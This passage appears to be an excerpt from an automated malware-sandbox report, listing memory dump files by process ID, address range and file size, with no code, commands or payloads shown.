memory/3708-429-0x0000000002C60000-0x0000000002C70000-memory.dmpFilesize
64KB
-
memory/3708-430-0x0000000002C60000-0x0000000002C70000-memory.dmpFilesize
64KB
-
memory/3816-368-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3816-392-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3816-371-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3816-370-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3816-366-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4384-133-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4384-161-0x0000000003920000-0x0000000003930000-memory.dmpFilesize
64KB
-
memory/4384-173-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4384-139-0x0000000003920000-0x0000000003930000-memory.dmpFilesize
64KB
-
memory/4384-137-0x0000000005F30000-0x0000000005F52000-memory.dmpFilesize
136KB
-
memory/4384-136-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4384-159-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4384-135-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4748-175-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4748-310-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4748-309-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-306-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-263-0x0000000000630000-0x0000000001138000-memory.dmpFilesize
11.0MB
-
memory/4748-262-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-255-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-185-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB
-
memory/4748-174-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-171-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-172-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4748-168-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB